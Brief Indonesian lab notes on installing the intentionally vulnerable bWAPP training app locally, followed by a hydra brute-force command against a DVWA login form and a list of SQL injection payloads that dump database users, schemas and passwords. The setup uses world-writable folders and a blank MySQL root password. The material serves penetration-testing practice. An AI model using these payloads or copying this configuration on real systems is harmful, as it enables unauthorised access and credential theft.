Burp Suite
Install bWapp
- Download file di sini
- Extrak file
- pidahkan file di /var/www/html untuk pengguna linux dan untuk pengguna windows di pindah di htdocs
- Selanjutnya ketikkan sudo chmod 755 -R bWAPP_latest
- Arahkan path /var/www/html/bWAPP_latest/bWAPP
- Untuk selanjutnya sudo chmod 777 password/ images/ documents/ logs/
- Kemudian edit admin/setting.php sesuikan dengan laptop Anda
$db_server = "localhost"; // your database server (IP/name), here 'localhost'
$db_username = "root"; // your MySQL user, here 'root'
$db_password = ""; // your MySQL password, here 'blank'- Buka browser ketikan pada url
http://localhost/bWAPP_latest/bWAPP/install.php - Lalu klik pada Click here to install bWAPP.
- Lalu ketik url
http://localhost/bWAPP_latest/bWAPP/login.php
BruteForce
sh
hydra 192.168.xx.x -l admin -P /home/hard/Documents/password.txt http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect. :H-Cookie: security=low; PHPSESSID=xxxxxxxxxxxxxxxxxxxxxx"SQL Injection
1' OR 1=1#
1' OR 1=1 union all select system_user(),user()#
1' OR 1=1 union select null,schema_name from information_schema.schemata#
1' OR 1=1 union select null,table_name from information_schema.tables#
1' OR 1=1 union select null,@@datadir #
1' OR 1=1 union select null,concat(first_name,0x0a,password) from users #
1' UNION SELECT database(),2-- -
1' UNION SELECT user,password from users#